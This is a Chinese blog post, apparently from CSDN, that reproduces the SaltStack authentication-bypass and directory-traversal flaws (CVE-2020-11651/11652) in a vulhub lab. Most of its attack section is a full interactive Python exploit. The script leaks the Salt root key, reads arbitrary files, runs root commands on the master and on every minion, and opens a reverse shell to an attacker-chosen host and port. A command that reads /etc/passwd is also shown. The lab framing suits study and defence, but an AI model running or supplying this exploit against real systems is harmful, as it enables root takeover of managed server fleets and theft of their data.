vulhub漏洞复现-saltstack(CVE-2020-11651、CVE-2020-11652)越权命令执行/遍历目录

最新推荐文章于 2024-04-06 06:43:40 发布
最新推荐文章于 2024-04-06 06:43:40 发布
阅读量4.6k 收藏 5
点赞数 1
分类专栏: vulhub 文章标签: VULHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/120666299
版权

SaltStack

基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集中管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本中出现了认证绕过漏洞CVE-2020-11651,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行。在CVE-2020-11652目录遍历漏洞中,攻击者通过构造恶意请求,读取服务器上任意文件。

思路

ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,可以用来直接在master publish服务器上对消息进行排队。这些消息可以用来触发minion来以root权限运行任意命令。

ClearFuncs类还会暴露 _prep_auth_info()方法,该方法会返回用来认证master服务器上本地root用户的命令的root key。然后root key就可以远程调用master 服务器的管理命令。这种无意的暴露提供给远程非认证的攻击者对salt master的与root权限等价的访问权限。

这里直接用现成PoC去打

漏洞复现

环境启动后会监听以下端口:

  1. 4505/4506 这是SaltStack Master与minions通信的端口
  2. 8000 这是Salt的API端口
  3. 2222 这是容器内部的SSH服务器监听的端口

执行前必须先安装salt库

pip3 install salt

在这里插入图片描述
CVE-2020-11651
下载完成后可直接执行来查看文件

python3 exploit.py --master vulhub.yster.live -r /etc/passwd

在这里插入图片描述
甚至有大佬贴出"全自动"PoC
在这里插入图片描述

#coding=gbk
# BASE https://github.com/bravery9/SaltStack-Exp
# 微信公众号:台下言书
# -*- coding:utf-8 -*- -
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
import datetime

import salt
import salt.version
import salt.transport.client
import salt.exceptions

DEBUG = False


def init_minion(master_ip, master_port):
    minion_config = {
        'transport': 'zeromq',
        'pki_dir': '/tmp',
        'id': 'root',
        'log_level': 'debug',
        'master_ip': master_ip,
        'master_port': master_port,
        'auth_timeout': 5,
        'auth_tries': 1,
        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
    }

    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')


def check_salt_version():
    print("[+] Salt 版本: {}".format(salt.version.__version__))

    vi = salt.version.__version_info__

    if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
        return True
    else:
        return False


def check_connection(master_ip, master_port, channel):
    print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
    sys.stdout.flush()
    try:
        channel.send({'cmd': 'ping'}, timeout=2)
        print('\033[1;32m可以连接\033[0m')
    except salt.exceptions.SaltReqTimeoutError:
        print("\033[1;31m无法连接\033[0m")
        sys.exit(1)


def check_CVE_2020_11651(channel):
    sys.stdout.flush()
    # try to evil
    try:
        rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
    except salt.exceptions.SaltReqTimeoutError:
        print("\033[1;32m不存在漏洞\033[0m")
    except:
        print("\033[1;32m未知错误\033[0m")
        raise
    else:
        pass
    finally:
        if rets:
            root_key = rets[2]['root']
            print("\033[1;31m存在漏洞\033[0m")
            return root_key

    return None


def pwn_read_file(channel, root_key, path, master_ip):
    # print("[+] Attemping to read {} from {}".format(path, master_ip))
    sys.stdout.flush()

    msg = {
        'key': root_key,
        'cmd': 'wheel',
        'fun': 'file_roots.read',
        'path': path,
        'saltenv': 'base',
    }

    rets = channel.send(msg, timeout=3)
    print(rets['data']['return'][0][path])



def pwn_getshell(channel, root_key, LHOST, LPORT):
    msg = {"key": root_key,
           "cmd": "runner",
           'fun': 'salt.cmd',
           "kwarg": {
               "fun": "cmd.exec_code",
               "lang": "python3",
               "code": "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{}\",{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);".format(
                   LHOST, LPORT)
           },
           'jid': '20200504042611133934',
           'user': 'sudo_user',
           '_stamp': '2020-05-04T04:26:13.609688'}

    try:
        response = channel.send(msg, timeout=3)
        print("Got response for attempting master shell: " + str(response) + ". Looks promising!")
        return True
    except:
        print("something failed")
        return False


def pwn_exec(channel, root_key, exec_cmd, master_or_minions):
    if master_or_minions == "master":
        msg = {"key": root_key,
               "cmd": "runner",
               'fun': 'salt.cmd',
               "kwarg": {
                   "fun": "cmd.exec_code",
                   "lang": "python3",
                   "code": "import subprocess;subprocess.call('{}',shell=True)".format(exec_cmd)
               },
               'jid': '20200504042611133934',
               'user': 'sudo_user',
               '_stamp': '2020-05-04T04:26:13.609688'}

        try:
            response = channel.send(msg, timeout=3)
            print("Got response for attempting master shell: " + str(response) + ". Looks promising!")
            return True
        except:
            print("something failed")
            return False

    if master_or_minions == "minions":
        print("Sending command to all minions on master")
        jid = "{0:%Y%m%d%H%M%S%f}".format(datetime.datetime.utcnow())
        cmd = "/bin/sh -c '{0}'".format(exec_cmd)

        msg = {'cmd': "_send_pub", "fun": "cmd.run", "arg": [cmd], "tgt": "*", "ret": "", "tgt_type": "glob",
               "user": "root", "jid": jid}

        try:
            response = channel.send(msg, timeout=3)
            if response == None:
                return True
            else:
                return False
        except:
            return False


#####################################

master_ip=input('目标IP:')
master_port='4506'
channel = init_minion(master_ip, master_port)
try:
    root_key = check_CVE_2020_11651(channel)
except:
    pass
while master_ip!='':
    print('1.测试POC  2.读取文件  3.执行命令(无回显)  4.反弹shell  5.退出')

    whattype=input('请选择:')
    if whattype=='1':
        check_salt_version()  # 检查salt版本
        check_connection(master_ip, master_port, channel)  # 检查连接
        root_key = check_CVE_2020_11651(channel)  # 读取root key
        print(root_key)
    elif whattype=='2':
        path = input('读取路径:')
        try:
            pwn_read_file(channel, root_key, path, master_ip)  # 读取文件
        except:
            print('文件不存在')
    elif whattype=='3':
        print('1.master   2.minions')
        exectype = input('选择方式:')
        if exectype=='1':
            master_or_minions='master'
        elif exectype=='2':
            master_or_minions = 'minions'
        exec_cmd = input('输入命令:')
        pwn_exec(channel, root_key, exec_cmd, master_or_minions)  # 执行命令
    elif whattype=='4':
        LHOST = input('反弹到IP:')
        LPORT = input('反弹端口:')
        pwn_getshell(channel, root_key, LHOST, LPORT)  # 反弹shell
    elif whattype=='5':
        exit()

原文链接:https://blog.csdn.net/qq_41901122/article/details/108623146
Matat4
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2417
vulhub-spring漏洞复现
漏洞复现vulhub tomcat弱口令漏洞
qq_53409748的博客
02-16 670
vulhub上的tomcat弱口令漏洞
Vulhub漏洞复现环境搭建流程,37岁程序员被裁
最新发布
m0_60608008的博客
04-06 564
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
vulhub漏洞复现1
xhscxj的博客
05-23 1874
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 1817
Shiro漏洞复现汇总
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 1万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1450
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
CVE-2020-11651:CVE-2020-11651
04-15
CVE-2020-11651 在2019.2.4之前的SaltSalt Salt中发现了一个问题,在3000.2。之前的3000中发现了一个问题。 盐主进程ClearFuncs类无法正确验证方法调用。 这使远程用户无需身份验证即可访问某些方法。 这些方法可...
salt-security-backports:CVE-2020-11651CVE-2020-11652的盐安全支持
03-08
: :warning: 此处的补丁是自定义的,可能与官方的补丁有所不同 :warning:向后移植了不支持的Salt版本的安全补丁 此存储库中的修补程序可解决以下CVECVE-2020-11651CVE-2020-11652- //labs.f-secure....
漏洞复现vulhub 中间件漏洞
qq_46421742的博客
08-09 315
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实现 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞复现过程。
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1516
vulhub漏洞复现练习篇
漏洞复现vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 380
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关复现资料,阅读很多文章,最终发现有博主出现和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
vulhub复现CVE-2022-22947
10-13
复现CVE-2022-22947漏洞,需要先在vulhub上搭建一个运行着vBulletin 5.6.4版本的环境。然后,通过发送特制的HTTP请求,即可触发漏洞,导致远程代码执行。 具体步骤如下: 1. 在vulhub上下载并启动vBulletin ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值